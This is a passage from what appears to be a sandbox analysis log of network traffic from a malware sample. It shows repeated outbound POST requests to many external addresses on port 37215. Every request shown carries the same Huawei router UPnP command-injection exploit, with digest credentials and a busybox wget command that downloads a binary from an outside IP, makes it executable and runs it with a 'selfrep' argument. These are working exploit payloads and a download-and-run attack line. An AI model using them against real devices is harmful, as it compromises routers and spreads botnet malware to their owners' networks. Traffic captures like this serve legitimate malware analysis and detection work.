6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2032192.168.2.1334358172.240.120.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688251019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2033192.168.2.1338894157.223.193.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688268900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2034192.168.2.1341884115.67.90.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688286066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2035192.168.2.1345384204.115.98.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688858032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2036192.168.2.1345592197.251.9.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688875914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2037192.168.2.1349716157.253.234.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688895941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2038192.168.2.1334534197.218.119.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688913107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2039192.168.2.134674024.40.41.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688935041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2040192.168.2.1355452157.83.67.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688951969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2041192.168.2.1339516197.128.31.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688965082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2042192.168.2.1356200157.146.94.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688983917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
